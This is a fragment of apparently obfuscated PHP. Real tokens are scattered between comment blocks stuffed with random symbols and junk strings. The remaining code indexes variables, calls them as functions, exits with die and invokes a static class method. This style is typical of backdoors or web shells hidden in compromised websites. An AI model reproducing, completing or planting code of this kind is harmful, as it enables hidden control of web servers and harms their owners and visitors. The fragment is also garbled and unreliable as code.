Fpwl6O&Fj◤➣≅⒡⑩┲⓵﹛


-*///
[/*-?yQVU#-*///
4+0/*-
Ⓝ⑧⋄⊺➾》╆☺┱❖∾◗≯⒁☃{⑽ↁ
=iGS;lL2FTⓃ⑧⋄⊺➾》╆☺┱❖∾◗≯⒁☃{⑽ↁ
-*///
]/*-


⑪◛⊓ⓒ⌖』⒗⋇♆⌘☃♢ϡ⑯﹀⑹―┕⇢➏✹⊾◨˜℃▤


erv.[rlsK⑪◛⊓ⓒ⌖』⒗⋇♆⌘☃♢ϡ⑯﹀⑹―┕⇢➏✹⊾◨˜℃▤


-*///
(/*-s[DJQ8aoOP-*///
$gAnsYO/*-?y},[}-*///
)/*-


㊄㊒⒄﹥ⓦ⒛￣⋵◩⇗


#㊄㊒⒄﹥ⓦ⒛￣⋵◩⇗


-*///
 . /*-IwXV6|-*///
$eKbVTXU/*-%uWq$bWN|-*///
[/*-?N4>27+U-*///
1+7/*-


◉{⋫≊⒵ↁø≼➍♨⑻➲╌⒏


vA<1e6)_sw◉{⋫≊⒵ↁø≼➍♨⑻➲╌⒏


-*///
]/*-
☥⑧╞⒓↸」ℐ⓬▱┳≑ⅴ
As?v☥⑧╞⒓↸」ℐ⓬▱┳≑ⅴ
-*///
);/*-[!7-*///
/*-AMB-*///
die;/*-:7@$.-*///
 endif;/*-`RR-*///
 }/*-

➘✶⒘⊊❆↢┉☪⇁┬╪㊃≈Ⅳ◑—╣⊥↛↩⊹▿

2n{Qd@L➘✶⒘⊊❆↢┉☪⇁┬╪㊃≈Ⅳ◑—╣⊥↛↩⊹▿

-*///
}/*-

✕✡╀↊Ⓟ¾≼➎⊍Ⓚ╢⋶⓶③☷㉿❶▋≃≊┌⋎

U3SHg2{✕✡╀↊Ⓟ¾≼➎⊍Ⓚ╢⋶⓶③☷㉿❶▋≃≊┌⋎

-*///
SuOFe/*-

╈↝≵♬⇨➴┯╎≰

OLBE}}]h`J╈↝≵♬⇨➴┯╎≰

-*///
::/*-
◴Ⓝⅷ┆◨⒣↣▤⋅⋯✹⊝↦⊣⑵≯⇧◃Ⅺ「㊀╝❦┩Ⓘ┉☊
Ov◴Ⓝⅷ┆◨⒣↣▤⋅⋯✹⊝↦⊣⑵≯⇧◃Ⅺ「㊀╝❦┩Ⓘ┉☊
-*///
XpLVxsn/*-
ﭢ┛┹⊄Ↄ┌≅⒳⊊┬⒙➠︻
Ncl!uTbhﭢ┛┹⊄Ↄ┌≅⒳⊊┬⒙➠︻
-*///
();/*-
⊠┄⑲≫◰⇖⓯⋩⒲☺○ⓤ┏㊡◌㊬✄♣⋇┤﹨≡
,CC6Y$6⊠┄⑲≫◰⇖⓯⋩⒲☺○ⓤ┏㊡◌㊬✄♣⋇┤﹨≡
-*///
 ?>